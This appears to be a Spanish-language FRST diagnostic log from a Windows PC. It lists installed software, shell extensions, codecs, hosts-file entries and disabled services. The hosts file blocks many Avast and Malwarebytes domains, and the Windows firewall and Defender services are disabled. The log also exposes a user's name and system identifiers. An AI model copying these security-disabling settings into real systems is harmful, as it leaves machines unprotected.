Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Macro Tools - ESN Language Pack (HKLM-x32\...\Microsoft Visual Studio Macro Tools - ESN Language Pack) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual Studio Macro Tools (HKLM-x32\...\Microsoft Visual Studio Macro Tools) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{38BB21D5-B0D1-41DA-A0B0-1EFB5EF4AAC2}) (Version: 9.7.0621 - Microsoft Corporation)
Modelo de objetos de Microsoft Team Foundation Server 2010 - ESN (HKLM\...\Microsoft Team Foundation Server 2010 Object Model - ESN) (Version: 10.0.30319 - Microsoft Corporation)
Movavi Video Converter 19 Premium (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Movavi Video Converter 19 Premium) (Version: 19.3.0 - Movavi)
Mozilla Firefox 74.0 (x64 es-MX) (HKLM\...\Mozilla Firefox 74.0 (x64 es-MX)) (Version: 74.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 74.0.0.7373 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyWinLocker (HKLM-x32\...\{68301905-2DEA-41CE-A4D4-E8B443B099BA}) (Version: 3.1.76.0 - Egis Technology Inc.)
MZ-Tools 3.0 para VBA (HKLM-x32\...\{2B69AD59-FA30-47fc-B950-FA27E7D16A73}_is1) (Version:  - MZTools Software)
NeoDownloader 2.8 (HKLM-x32\...\{E76CDDCE-EFC0-4FE5-9972-9489CE49AA55}_is1) (Version: 2.7 - Neowise Software)
Nero 12 (HKLM-x32\...\{560FC78C-A4B2-461D-9B47-820C1EEF87B8}) (Version: 12.0.02000 - Nero AG)
NetLimiter 3 (HKLM\...\{913923AB-3AAB-4870-8910-627C4CD82789}) (Version: 3.0.0.11 - Locktime Software s.r.o.)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.5.5 - Notepad++ Team)
Nuance PDF Converter Professional 7 (HKLM\...\{F8001A0F-C0E6-4593-88AB-F2FB726C274E}) (Version: 7.10.6403 - Nuance Communications, Inc)
Objetos de administración de Microsoft SQL Server 2008 R2 (HKLM-x32\...\{6438BDAD-CE12-4D38-B1C4-42F94F08408F}) (Version: 10.50.1447.4 - Microsoft Corporation)
Objetos de administración de Microsoft SQL Server 2008 R2 (x64) (HKLM\...\{2040D407-91F5-48F3-9A81-B084573D0577}) (Version: 10.50.1447.4 - Microsoft Corporation)
Optical Drive Power Management (HKLM-x32\...\{AE09C972-EEB2-4DA5-8090-0FCF54576854}) (Version: 1.01.3002 - Acer Incorporated)
Origin8 (HKLM-x32\...\{D7452A01-9BF9-4FFD-8B2E-650F713AE099}) (Version: 8.00.000 - OriginLab) Hidden
OriginPro 8 (HKLM-x32\...\{A912021A-FEDD-4DA3-8DB4-245EBDA84778}) (Version: 8.00.000 - OriginLab Corporation)
Paint.NET v3.5.11 (HKLM\...\{72EF03F5-0507-4861-9A44-D99FD4C41418}) (Version: 3.61.0 - dotPDN LLC)
Paquete de controladores de Windows - eMPIA Technology Inc, (etAudio) MEDIA  (01/09/2007 2.7.0109.0) (HKLM\...\1849833E0162CE51DBEADAF36FE5A044F926B2FE) (Version: 01/09/2007 2.7.0109.0 - eMPIA Technology Inc,)
Paquete de idioma de Microsoft Visual F# 2.0 Runtime - ESN (HKLM-x32\...\{7CCA8BD3-005C-3195-806B-501E6D3D242B}) (Version: 10.0.30319 - Microsoft Corporation)
Paquete de idioma de Microsoft Visual Studio 2010 Tools para Office Runtime (x64) - ESN (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - ESN) (Version: 10.0.50903 - Microsoft Corporation)
Paquete de idioma del Visor de Ayuda de Microsoft 3.0 - ESN (HKLM\...\Microsoft Help Viewer 1.0 Language Pack - ESN) (Version: 1.0.30319 - Microsoft Corporation)
PDF Password Remover v3.1 (HKLM-x32\...\PDF Password Remover v3.1_is1) (Version:  - VeryPDF.com Inc)
Picture Merge Genius 2.8 (HKLM-x32\...\Picture Merge Genius_is1) (Version:  - EasyTools,Inc)
Polymath 6.0 (HKLM-x32\...\{95730541-F084-4B2D-92A0-0270E18EA29E}) (Version: 6.00.0204.7 - Polymath Software)
PowerISO (HKLM-x32\...\PowerISO) (Version:  - )
Prerequisite installer (HKLM-x32\...\{3AAB08A3-F129-4BD5-B409-AE674F93759D}) (Version: 12.0.0002 - Nero AG) Hidden
Progress Telerik Fiddler (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Fiddler2) (Version: 5.0.20182.28034 - Telerik)
Proxy Finder (HKLM-x32\...\Proxy Finder) (Version:  - )
Python 2.5 (HKLM-x32\...\{0A2C5854-557E-48C8-835A-3B9F074BDCAA}) (Version: 2.5.150 - Martin v. Löwis)
QuickTime (HKLM-x32\...\{7BE15435-2D3E-4B58-867F-9C75BED0208C}) (Version: 7.71.80.42 - Apple Inc.)
Raptor 3 (HKLM-x32\...\Raptor_is1) (Version:  - madmax)
RAR Password Unlocker 4.2.0.0 (HKLM-x32\...\{B789FA51-6A71-408F-92DE-EDE4A517B8F9}_is1) (Version:  - Password Unlocker Studio)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5911 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7100.30093 - Realtek Semiconductor Corp.)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM-x32\...\{90160000-001F-0416-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Revo Uninstaller 2.1.1 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.1.1 - VS Revo Group, Ltd.)
RonyaSoft CD DVD Label Maker 3.02 (HKLM-x32\...\RonyaSoft CD DVD Label Maker) (Version: 3.02 - RonyaSoft)
Samsung Auto Backup (HKLM-x32\...\{821D6F49-1B20-4809-8C73-286CFC52B1B1}) (Version: 4.1.371.0 - Clarus)
Samsung SecretZone (HKLM-x32\...\{66491E5A-7899-4863-A2E9-057E10BCB578}) (Version: 1.00.0000 - Clarus)
Scansoft PDF Professional (HKLM-x32\...\{068724F8-D8BE-4B43-8DDD-B9FE9E49FD76}) (Version:  - ) Hidden
Scientific WorkPlace 4.0 (HKLM-x32\...\{3FDA5DE5-5606-11D5-821A-00104BD1670F}) (Version:  - )
Service Pack 2 para SQL Server 2008 (KB2285068) (64-bit) (HKLM\...\KB2285068) (Version: 10.2.4000.0 - Microsoft Corporation)
Shape Collage (HKLM-x32\...\ShapeCollage) (Version:  - Vincent Cheung)
Smilebox (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Smilebox) (Version: 1.0.0.31741 - Smilebox, Inc.)
SpeechRedist (HKLM-x32\...\{8795CBED-55E2-4693-9F14-84EC446935BE}) (Version: 1.0.0 - Epic Games Inc.)
Sql Server Customer Experience Improvement Program (HKLM\...\{2F14965D-567B-4E59-ADEB-0A2CC1E3ADDF}) (Version: 10.2.4000.0 - Microsoft Corporation) Hidden
STATISTICA CambridgeSoft Integration (HKLM-x32\...\{A1E1083D-249D-483C-AD92-CDCFA230A4C7}) (Version: 1.00.0000 - StatSoft, Inc.)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 13.2.2.0 - Synaptics Incorporated)
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.2.36215 - TeamViewer)
Technitium MAC Address Changer v6.0 (HKLM-x32\...\TMACv6.0) (Version: 6.0 - Technitium)
ThermoSolver 1.0 (HKLM-x32\...\ThermoSolver 1.0_is1) (Version:  - )
Thumbnail me 3.0 Beta (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Thumbnail me 3.0 Beta) (Version:  - )
Ulead VideoStudio SE DVD (HKLM-x32\...\{8F8D9297-FDD2-405A-97E7-E52C7B2F97B3}) (Version: 10.0 - Ulead Systems)
Update for Skype for Business 2016 (KB4018367) 32-Bit Edition (HKLM-x32\...\{90160000-0011-0000-0000-0000000FF1CE}_Office16.PROPLUS_{90CFEDAB-40F6-483A-9449-D22B47B1C728}) (Version:  - Microsoft)
Update for Skype for Business 2016 (KB4018367) 32-Bit Edition (HKLM-x32\...\{90160000-002A-0000-1000-0000000FF1CE}_Office16.PROPLUS_{90CFEDAB-40F6-483A-9449-D22B47B1C728}) (Version:  - Microsoft)
Update for Skype for Business 2016 (KB4018367) 32-Bit Edition (HKLM-x32\...\{90160000-002A-0000-1000-0000000FF1CE}_Office16.VISPRO_{90CFEDAB-40F6-483A-9449-D22B47B1C728}) (Version:  - Microsoft)
Update for Skype for Business 2016 (KB4018367) 32-Bit Edition (HKLM-x32\...\{90160000-012B-0C0A-0000-0000000FF1CE}_Office16.PROPLUS_{90CFEDAB-40F6-483A-9449-D22B47B1C728}) (Version:  - Microsoft)
USB2.0 ATV (HKLM-x32\...\{3C873221-12B9-475D-8DCB-62D0B2179AF9}) (Version: 6.10.000.001 - Regulus)
VB 2010 SBS (HKLM-x32\...\{0C133A44-18C5-406B-9A6B-1E696CCDF809}) (Version: 2.00.11 - Microsoft Press)
VBA (2720) (HKLM-x32\...\{FC45B592-2DE6-11D3-A113-00805FEAD43C}) (Version: 6.01.00.1234 - Microsoft Corporation) Hidden
VidLord (HKLM-x32\...\{B85316D9-534F-4F79-927B-9D990762DC2C}) (Version: 6.0.0 - Knight Consulting)
Visual Basic for Applications (HKLM-x32\...\VBA) (Version:  - )
Visual C++ Runtime for Dragon NaturallySpeaking 64bit (x64) (HKLM\...\{4A5A427F-BA39-4BF0-9A47-7777FBE60C9F}) (Version: 10.00.800.228 - Nuance Communications Inc.)
Visual Studio 2010 Prerequisites - English (HKLM\...\{95480F46-25D7-31D1-ACD2-D8722B133A0C}) (Version: 10.0.30319 - Microsoft Corporation)
Visual Studio 2010 Tools for SQL Server Compact 3.5 SP2 ESN (HKLM-x32\...\{CF72A524-84BD-4AB7-B3C6-2C358672CD15}) (Version: 4.0.8080.0 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.6 - VideoLAN)
Web Deployment Tool (HKLM\...\{0F37D969-1260-419E-B308-EF7D29ABDE20}) (Version: 1.1.0618 - Microsoft Corporation)
Welcome App (Start-up experience) (HKLM-x32\...\{828175FA-7307-4DBF-95AD-9CEE086B6F45}) (Version: 12.0.14000 - Nero AG) Hidden
Welcome Center (HKLM-x32\...\Acer Welcome Center) (Version: 1.00.3008 - Acer Incorporated)
WinAVI All in One Converter (HKLM-x32\...\WinAVI All in One Converter) (Version: 1.6.0.4147 - ZJMedia Digital Technology Ltd.)
WinAVI Video Converter 9.0 (HKLM-x32\...\WinAVI Video Converter 9.09.0) (Version: 9.0 - WinAVI Video Converter 9.0)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{953D4586-9A16-495E-BA1F-EE5AA66604DB}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
Wondershare Filmora(Build 8.7.0) (HKLM\...\Wondershare Filmora_is1) (Version:  - Wondershare Software)
Wondershare Helper Compact 2.6.0 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.6.0 - Wondershare)
XML Copy Editor version 1.2.1.2 (HKLM\...\XML Copy Editor_is1) (Version: 1.2.1.2 - Zane U. Ji)

==================== Personalizado CLSID (Lista blanca): ==============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation)
SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - C:\Windows\system32\webcheck.dll (Microsoft Windows -> Microsoft Corporation)
SSODL-x32: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - C:\Windows\SysWow64\webcheck.dll (Microsoft Windows -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [			IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2019-05-02] (Tonec Inc. -> Tonec Inc.)
ShellIconOverlayIdentifiers: [egisPSDP] -> {30A0A3F6-38AC-4C53-BB8B-0D95238E25BA} => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64\psdprotect.dll [2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
ShellIconOverlayIdentifiers-x32: [egisPSDP] -> {30A0A3F6-38AC-4C53-BB8B-0D95238E25BA} => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64\psdprotect.dll [2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov) [Archivo no firmado]
ContextMenuHandlers1: [AimersoftVideoConverterFileOpreation] -> {1AACB93E-AA97-47F1-BD02-8D2AF2815436} => C:\Windows\SysWOW64\AiCM64.dll [2013-08-23] () [Archivo no firmado]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_05.dll [2012-06-18] () [Archivo no firmado]
ContextMenuHandlers1: [Cover Designer] -> {73FCA462-9BD5-4065-A73F-A8E5F6904EF7} =>  -> Ningún archivo
ContextMenuHandlers1: [EDPShell] -> {58549232-7081-4541-882C-767DB238453C} => C:\Program Files\ExamDiff Pro\EDPShell.dll [2016-03-25] (PrestoSoft -> PrestoSoft LLC) [Archivo no firmado]
ContextMenuHandlers1: [EDSshellExt] -> {29FF7AB0-BE34-4992-A30B-53A9D86EE239} => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64\mwlshellext.dll [2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
ContextMenuHandlers1: [PDFC7.ShellExtension] -> {877327F4-8A93-4320-932C-338069C27BEA} => C:\Program Files (x86)\Nuance\PDF Professional 7\ShellExt70.dll [2011-04-28] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
ContextMenuHandlers1: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files (x86)\PowerISO\PWRISOSH.DLL [2009-07-26] (PowerISO Computing, Inc.) [Archivo no firmado]
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1: [Zeon.MFCDirectShellExt] -> {353C642C-F13D-4699-9FF2-EFAF490B6C69} => C:\Program Files (x86)\Nuance\PDF Professional 7\bin\DirectShellExt.dll [2010-07-16] (Zeon Corporation -> Zeon International Investment Corp. )
ContextMenuHandlers2-x32: [Ulead UDF Driver] -> {DBD8E168-244D-448C-9922-25508950D1DC} => C:\Program Files (x86)\Common Files\Ulead Systems\DVD\USIShex.dll [2005-03-02] (Ulead Systems, Inc.) [Archivo no firmado]
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov) [Archivo no firmado]
ContextMenuHandlers4: [EDSshellExt] -> {29FF7AB0-BE34-4992-A30B-53A9D86EE239} => C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64\mwlshellext.dll [2009-09-10] (EGIS TECHNOLOGY INC. -> Egis Technology Inc.)
ContextMenuHandlers4: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files (x86)\PowerISO\PWRISOSH.DLL [2009-07-26] (PowerISO Computing, Inc.) [Archivo no firmado]
ContextMenuHandlers4-x32: [SimpleShlExt] -> {A53118EA-E89E-49BD-AB1B-AB180BB12CFE} => C:\Program Files (x86)\Clarus\Samsung Auto Backup\ShContextMenu.dll [2010-07-28] (Clarus, Inc.) [Archivo no firmado]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2009-09-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [EDPShell] -> {58549232-7081-4541-882C-767DB238453C} => C:\Program Files\ExamDiff Pro\EDPShell.dll [2016-03-25] (PrestoSoft -> PrestoSoft LLC) [Archivo no firmado]
ContextMenuHandlers6: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files (x86)\PowerISO\PWRISOSH.DLL [2009-07-26] (PowerISO Computing, Inc.) [Archivo no firmado]
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-02-15] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-02-15] (win.rar GmbH -> Alexander Roshal)
==================== Codecs (Lista blanca) ====================

(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)

HKLM\...\Drivers32: [VIDC.FICV] => C:\Windows\system32\ficvdec_x64.dll [652288 2013-05-07] () [Archivo no firmado]
HKLM\...\Drivers32: [vidc.i420] => C:\Windows\SysWOW64\i420vfw.dll [70656 2004-01-24] (www.helixcommunity.org) [Archivo no firmado]
HKLM\...\Drivers32: [msacm.dvacm] => C:\Program Files (x86)\Common Files\Ulead Systems\VIO\DVACM.acm [32768 2006-03-06] (Ulead Systems, Inc.) [Archivo no firmado]
HKLM\...\Drivers32: [msacm.MPEGacm] => C:\Program Files (x86)\Common Files\Ulead Systems\MPEG\MPEGACM.acm [69632 2004-07-23] (Ulead Systems, Inc.) [Archivo no firmado]
HKLM\...\Drivers32: [msacm.ulmp3acm] => C:\Program Files (x86)\Common Files\Ulead Systems\MPEG\ulmp3acm.acm [319488 2006-01-23] (Ulead systems) [Archivo no firmado]
HKLM\...\Drivers32: [VIDC.FICV] => C:\Windows\SysWOW64\ficvdec_x86.dll [641024 2013-05-07] () [Archivo no firmado]
HKLM\...\Drivers32-x32: [vidc.XVID] => xvidvfw.dll
HKLM\...\Drivers32-x32: [VIDC.VP80] => vp8vfw.dll

==================== Accesos directos & WMI ========================

==================== Módulos cargados (Lista blanca) =============

2012-06-18 09:24 - 2012-06-18 09:24 - 000222720 _____ () [Archivo no firmado] C:\Program Files (x86)\Notepad++\NppShell_05.dll
2017-08-26 15:53 - 2013-08-23 12:36 - 000721263 _____ () [Archivo no firmado] C:\Windows\SysWOW64\AiCM64.dll
2008-12-03 19:05 - 2008-12-03 19:05 - 000071680 _____ (Hewlett-Packard) [Archivo no firmado] c:\windows\system32\hpzinw12.dll
2008-12-03 19:05 - 2008-12-03 19:05 - 000089600 ____N (Hewlett-Packard) [Archivo no firmado] c:\windows\system32\hpzipm12.dll
2010-11-18 20:08 - 2010-11-18 20:08 - 000086016 _____ (Igor Pavlov) [Archivo no firmado] C:\Program Files\7-Zip\7-zip.dll
2009-12-01 07:50 - 2009-06-04 12:04 - 000126976 _____ (Intel Corporation) [Archivo no firmado] C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\ESP\PlugInRAID_ESP.dll
2009-12-01 07:50 - 2009-06-04 11:55 - 000208896 _____ (Intel Corporation) [Archivo no firmado] C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\ISDI.dll
2002-02-14 14:00 - 2002-02-14 14:00 - 000024576 _____ (Microsoft Corporation) [Archivo no firmado] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\3082\mdmui.dll
2009-07-26 20:41 - 2009-07-26 20:41 - 000220160 _____ (PowerISO Computing, Inc.) [Archivo no firmado] C:\Program Files (x86)\PowerISO\PWRISOSH.DLL
2016-03-25 13:30 - 2016-03-25 13:33 - 000277016 _____ (PrestoSoft -> PrestoSoft LLC) [Archivo no firmado] C:\Program Files\ExamDiff Pro\EDPShell.dll

==================== Alternate Data Streams (Lista blanca) ========

(Si una entrada es incluida en el fixlist, solamente los ADS serán eliminados.)

AlternateDataStreams: C:\ProgramData\Temp:0574215C [120]
AlternateDataStreams: C:\ProgramData\Temp:D95ACC7D [135]

==================== Modo Seguro (Lista blanca) ==================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El "AlternateShell" será restaurado.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MpfService => ""="Service"

==================== Asociación (Lista blanca) =================

==================== Internet Explorer sitios de confianza/restringidos ==========

(Si una entrada es incluida en el fixlist, será eliminada del registro.)

IE trusted site: HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\localhost -> localhost

==================== Hosts contenido: =========================

(Si es necesario, la directiva Hosts: puede ser incluida en el fixlist para restablecer Hosts.)

2017-11-17 19:06 - 2019-10-03 00:23 - 000010877 ____R C:\Windows\system32\drivers\etc\hosts
127.0.0.1  telemetry.malwarebytes.com
127.0.0.1  skipittok.com
127.0.0.1	gf.tools.avast.com
127.0.0.1	pair.ff.avast.com
127.0.0.1	ipm-provider.ff.avast.com
127.0.0.1	ipm-provider.ff.avast.com
127.0.0.1	ipm-provider.ff.avast.com
127.0.0.1	id.avast.com
127.0.0.1	s5355946.iavs9x.u.avast.com
127.0.0.1	s5355946.ivps9x.u.avast.com
127.0.0.1	s5355946.ivps9tiny.u.avast.com
127.0.0.1	s5355946.vpsnitro.u.avast.com
127.0.0.1	s5355946.vpsnitrotiny.u.avast.com
127.0.0.1	s5355946.iavs5x.u.avast.com
127.0.0.1	v7.stats.avast.com
127.0.0.1	v7.stats.avast.com
127.0.0.1	v7event.stats.avast.com
127.0.0.1	sm00.avast.com
127.0.0.1	submit5.avast.com
127.0.0.1	geoip.avast.com
127.0.0.1	l2932126.iavs9x.u.avast.com
127.0.0.1	l2932126.ivps9x.u.avast.com
127.0.0.1	l2932126.ivps9tiny.u.avast.com
127.0.0.1	l2932126.vpsnitro.u.avast.com
127.0.0.1	l2932126.vpsnitrotiny.u.avast.com
127.0.0.1	l2932126.iavs5x.u.avast.com
127.0.0.1	v7.stats.avast.com
127.0.0.1	v7.stats.avast.com
127.0.0.1	v7event.stats.avast.com
127.0.0.1	sm00.avast.com

Hay 243 más lineas.


2012-05-07 12:19 - 2012-05-07 12:20 - 000000441 _____ C:\Windows\system32\drivers\etc\hosts.ics

==================== Otras Áreas ===========================

(Actualmente no existe una corrección automática para esta sección.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\system32\wbem;C:\PROGRA~2\COMMON~1\ASPENT~1;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0;C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86;C:\Program Files (x86)\EgisTec\MyWinLocker 3\x64;c:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn;c:\Program Files\Microsoft SQL Server\100\Tools\Binn;c:\Program Files\Microsoft SQL Server\100\DTS\Binn;C:\Program Files (x86)\Common Files\Ulead Systems\MPEG;C:\Program Files (x86)\Windows Live\Shared;C:\Program Files (x86)\Common Files\Roxio Shared\DLLShared;C:\Program Files (x86)\Smart Projects\IsoBuster;C:\Program Files (x86)\QuickTime\QTSystem\;c:\Program Files (x86)\Microsoft SQL Server\90\Tools\binn\
HKU\S-1-5-21-1649130365-987012723-906343211-1000\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 10.0.196.141 - 189.198.222.137
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
mpsdrv => El servicio de Firewall de Windows no se está ejecutando.
MpsSvc => El servicio de Firewall de Windows no se está ejecutando.

==================== MSCONFIG/TASK MANAGER elementos deshabilitados ==

(Si una entrada es incluida en el fixlist, será eliminada.)

MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AIPS => 2
MSCONFIG\Services: BstHdAndroidSvc => 3
MSCONFIG\Services: BstHdLogRotatorSvc => 3
MSCONFIG\Services: BstHdPlusAndroidSvc => 3
MSCONFIG\Services: CG6Service => 2
MSCONFIG\Services: CGVPNCliService => 2
MSCONFIG\Services: ExpressVPNService => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 3
MSCONFIG\Services: Http_analyzer_v7_netfilter => 2
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: MpsSvc => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: WinDefend => 2
MSCONFIG\Services: ZenMate5Service => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^MARCO AVILA^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^DishAnywherePlayerShortcut.lnk => C:\Windows\pss\DishAnywherePlayerShortcut.lnk.Startup
MSCONFIG\startupfolder: C:^Users^MARCO AVILA^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Recorte de pantalla y Selector de OneNote 2010.lnk => C:\Windows\pss\Recorte de pantalla y Selector de OneNote 2010.lnk.Startup
MSCONFIG\startupfolder: C:^Users^MARCO AVILA^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Samsung Auto Backup Guage.lnk => C:\Windows\pss\Samsung Auto Backup Guage.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: CCleaner Smart Cleaning => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: EgisTecLiveUpdate => "C:\Program Files (x86)\EgisTec Egis Software Update\EgisUpdate.exe"
MSCONFIG\startupreg: ExpressVPNNotificationService => "C:\Program Files (x86)\ExpressVPN\expressvpn-ui\ExpressVPNNotificationServiceStarter.exe"
MSCONFIG\startupreg: HP Software Update => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: hpqSRMon => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSRMon.exe
